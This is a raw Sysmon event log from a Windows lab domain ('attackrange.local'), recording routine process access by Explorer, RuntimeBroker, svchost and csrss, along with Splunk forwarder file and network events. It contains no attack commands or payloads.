08:05:34.523{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.523{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A4C543F5A957AE12D3E8E16AA82067D,SHA256=ABC00115FE37A9FDB3F631A183D86C7D5F5D179E5D5859A82FA69C2D6D93AFB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:35.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFAFF2FD9DDE9C328E0BAC4D6BDDA07,SHA256=A0C28F66AB18C611A6DB2F2C88D85ECD27F9B3E84C5E680B2F362559FE1A0B3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:27.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61937-false10.0.1.12-8000- 10341000x80000000000000001053762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.926{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.910{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.910{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.895{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.895{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.895{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.863{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.863{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.848{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.848{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 